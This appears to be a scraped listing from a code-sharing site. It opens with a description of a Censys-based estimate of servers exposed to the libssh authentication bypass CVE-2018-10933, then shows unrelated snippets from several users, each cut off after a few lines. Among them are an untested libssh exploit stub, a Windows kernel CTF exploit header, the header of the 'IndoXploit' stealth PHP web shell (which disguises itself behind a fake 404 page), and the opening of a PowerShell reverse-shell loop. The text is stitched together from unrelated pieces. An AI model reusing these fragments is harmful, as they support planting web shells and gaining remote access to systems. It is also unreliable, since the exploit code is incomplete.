0x4D31

Libssh authentication bypass vulnerability (CVE-2018-10933)

An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug.

• CVE-2018-10933 Advisory
• Exploit - Patched Libssh Client
• CVE-2018-10933-test
• libSSH-Authentication-Bypass
• HASSH - an SSH client/server profiling method
• ssh-hassh nmap script

mlosapio

#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933 

import sys, paramiko
import logging

username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]

f0r34chb3t4

wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add - 

sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'

sudo apt-get update 

sudo apt-get install google-chrome-stable

j00ru

// WCTF 2018 "searchme" task exploit
//
// Author:    Mateusz "j00ru" Jurczyk
// Date:      6 July 2018
// Tested on: Windows 10 1803 (10.0.17134.165)
//
// See also:  https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>

f0r34chb3t4

def extract_form_fields(self, soup):
    "Turn a BeautifulSoup form in to a dict of fields and default values"
    fields = {}
    for input in soup.findAll('input'):
        # ignore submit/image with no name attribute
        if input['type'] in ('submit', 'image') and not input.has_key('name'):
            continue
        
        # single element nome/value fields
        if input['type'] in ('text', 'hidden', 'password', 'submit', 'image'):

lc-at

<?php
/*
* # IndoXploit v3 Web Shell (Stealth Version)
* # What was involved?
*   - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
*   - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
* # Important Bookmark
*   - Password configuration at line 27
*   - login_shell() function at line 40-52
*   - Login validation at line 57-64

dicksonkv

import sys


# Loading dns module.
try:
    import dns.resolver
    resolver = dns.resolver.Resolver()
    resolver.timeout = 0.10
    resolver.lifetime = 0.10
except:

SilverBut

#---------------------------------------------------------------------
# Example configuration for a possible web application.  See the
# full configuration options online.
#
#   http://haproxy.1wt.eu/download/1.4/doc/configuration.txt
#
#---------------------------------------------------------------------

global
    log         127.0.0.1 local2

staaldraad

$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
	$writer.Flush();
	$read = $null;

akshaybabloo

#!/usr/bin/env python
# -*- coding utf-8 -*-
#
# Copyright 2016 Akshay Raj Gollahalli

import dns.resolver


def get_records(domain):
    """